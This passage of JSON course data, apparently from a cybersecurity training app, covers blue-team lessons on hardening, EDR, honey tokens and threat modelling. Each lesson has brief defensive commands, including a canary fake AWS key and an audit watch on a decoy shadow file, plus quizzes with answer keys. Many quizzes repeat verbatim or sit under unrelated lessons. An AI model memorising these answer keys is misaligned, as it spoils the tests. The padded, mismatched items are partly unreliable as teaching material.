block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"cis-benchmarks","cat":"Defense & Blue Team","title":"CIS Benchmarks","diff":1,"xp":75,"intro":"Industry-standard security configuration baselines.","sections":[{"type":"text","content":"CIS defines secure settings for OS, cloud, databases, applications."},{"type":"code","lang":"bash","content":"lynis audit system"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"CIS Benchmarks are?","opts":["Exploit databases","Security configuration guidelines","Monitoring tools","Vulnerability scanners"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum access needed for the job","Maximum access","Read-only access"],"ans":1},{"type":"quiz","q":"SIEM stands for...","opts":["Security Information and Event Management","System Integration and Error Monitoring","Secure Internet Email Manager","Server Infrastructure Event Module"],"ans":0},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"hardening-linux","cat":"Defense & Blue Team","title":"Linux Hardening","diff":1,"xp":100,"intro":"Reduce attack surface to the minimum necessary.","sections":[{"type":"text","content":"Disable services, configure firewall, enforce passwords, enable auditing."},{"type":"code","lang":"bash","content":"systemctl disable cups bluetooth avahi-daemon\nsed -i 's/^#*PermitRootLogin.*/PermitRootLogin no/' /etc/ssh/sshd_config"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"SSH setting to disable on production?","opts":["PubkeyAuthentication","PermitRootLogin","Port 22","AllowTcpForwarding"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"hardening-windows","cat":"Defense & Blue Team","title":"Windows Hardening","diff":1,"xp":100,"intro":"Disable SMBv1, enforce LAPS, configure AppLocker.","sections":[{"type":"text","content":"Disable SMBv1, LLMNR, enable PowerShell logging, apply baselines."},{"type":"code","lang":"powershell","content":"Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Disable to prevent NTLM relay?","opts":["DNS","LLMNR and NBT-NS","DHCP","ARP"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"apparmor-selinux","cat":"Defense & Blue Team","title":"AppArmor and SELinux","diff":2,"xp":150,"intro":"Mandatory access control: even root is restricted.","sections":[{"type":"text","content":"AppArmor: path-based (easier). SELinux: label-based (more granular)."},{"type":"code","lang":"bash","content":"aa-enforce /usr/sbin/nginx\ngetenforce && setenforce 1"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"MAC beyond Unix permissions?","opts":["Nothing extra","Restricts even root to policy actions","Speeds up access","Encrypts files"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"edr-basics","cat":"Defense & Blue Team","title":"Endpoint Detection and Response","diff":1,"xp":75,"intro":"Beyond antivirus: behavioral detection and response.","sections":[{"type":"text","content":"EDR monitors behavior: process creation, file mods, network, registry. Uses ML for detection."},{"type":"code","lang":"bash","content":"# Platforms: CrowdStrike, Defender, DarknodeOne, Carbon Black"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"EDR vs traditional AV?","opts":["EDR is free","EDR uses behavioral analysis, not just signatures","EDR only Linux","EDR replaces firewall"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"honey-tokens","cat":"Defense & Blue Team","title":"Honey Tokens and Canary Files","diff":2,"xp":150,"intro":"Fake creds and tripwire files. Zero false positives.","sections":[{"type":"text","content":"Plant fake credentials. Any access = attacker detected."},{"type":"code","lang":"bash","content":"echo 'aws_access_key_id = AKIAIOSFODNN7EXAMPLE' > ~/.aws/credentials.bak\nauditctl -w /opt/backup/shadow.bak -p r -k canary"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Honey token false positive rate?","opts":["High","Nearly zero","Medium","Depends"],"ans":1},{"type":"quiz","q":"Docker containers share the host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"Kubernetes secrets are stored as...","opts":["Encrypted by default","Base64 encoded (not encrypted)","Plain text","Hashed"],"ans":1},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"network-segmentation","cat":"Defense & Blue Team","title":"Network Segmentation","diff":1,"xp":75,"intro":"Divide network into isolated zones.","sections":[{"type":"text","content":"VLANs, firewalls, ACLs between segments. Limits lateral movement."},{"type":"code","lang":"bash","content":"# Segments: DMZ, Corporate, Server, Management, IoT"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Primary benefit of segmentation?","opts":["Faster speeds","Contains breaches, limits lateral movement","Reduces costs","Simplifies management"],"ans":1},{"type":"quiz","q":"A container escape gives access to...","opts":["Another container","The host system","The internet","Nothing"],"ans":1},{"type":"quiz","q":"The shared responsibility model means...","opts":["The cloud provider handles everything","Security is shared between provider and customer","The customer handles everything","No one is responsible"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"threat-modeling-stride","cat":"Defense & Blue Team","title":"Threat Modeling (STRIDE)","diff":2,"xp":150,"intro":"Systematically identify what can go wrong.","sections":[{"type":"text","content":"Spoofing, Tampering, Repudiation, Information Disclosure, DoS, Elevation of Privilege."},{"type":"code","lang":"bash","content":"# Apply STRIDE to each component of your application"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"E in STRIDE?","opts":["Encryption","Elevation of Privilege","Exploitation","Enumeration"],"ans":1},{"type":"quiz","q":"Instance metadata is accessible at...","opts":["8.8.8.8","127.0.0.1","169.254.169.254","10.0.0.1"],"ans":2},{"type":"quiz","q":"Docker containers share the host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"MFA stands 